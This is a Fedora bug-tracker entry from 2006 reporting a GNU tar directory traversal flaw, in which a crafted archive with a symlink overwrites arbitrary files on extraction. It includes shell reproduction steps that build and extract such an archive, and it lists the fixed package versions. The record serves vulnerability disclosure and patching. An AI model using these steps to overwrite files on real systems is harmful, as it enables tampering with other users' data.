Bug 216938 - GNU tar directory traversal
Summary: GNU tar directory traversal
Keywords:
Status: CLOSED RAWHIDE
Alias: None
Product: Fedora
Classification: Fedora
Component: tar
Version: 6
Hardware: All
OS: Linux
medium
high
Target Milestone: ---
Assignee: Peter Vrabec
QA Contact: Ben Levenson
URL: http://lists.grok.org.uk/pipermail/fu...
Whiteboard: impact=moderate,source=fulldisclosure...
Depends On: 216937
Blocks:
TreeView+ depends on / blocked
 
Reported: 2006-11-22 19:47 UTC by Lubomir Kundrak
Modified: 2007-11-30 22:11 UTC (History)
0 users

Fixed In Version:
Clone Of:
Environment:
Last Closed: 2006-12-04 15:48:41 UTC
Type: ---
Embargoed:


Attachments (Terms of Use)

Description Lubomir Kundrak 2006-11-22 19:47:23 UTC
+++ This bug was initially created as a clone of Bug #216937 +++

Description of problem:

GNU tar contains a flaw, that makes tar overwrite an arbitrairy file when
extracting a crafted archive.

See the original advisory for details.

Steps to Reproduce:

#TAR=/usr/src/redhat/BUILD/tar-1.13.25/src/tar
TAR=tar

# crafting a symlink

gcc -o tarxyz tarxyz.c
./tarxyz > xyz.tar

# cleaning environment up

rm -f/home/$USER/hello.txt
rm -f xyz

# adding files, relative to xyz/

mkdir -p xyz/home/$USER
echo "Hello" > xyz/home/$USER/hello.txt
tar -rf xyz.tar xyz/home/$USER

# exploitation

rm -rf xyz      # so symlink to / can be created
$TAR -xf xyz.tar
cat /home/$USER/hello.txt

Additional info:

All supported RHEL (2.1--4) and FC (5,6) releases are vulnerable

Comment 1 Peter Vrabec 2006-12-04 15:48:41 UTC
fixed in: tar-1.15.1-22.fc6, tar-1.15.1-17.FC5.


Note You need to log in before you can comment on or make changes to this bug.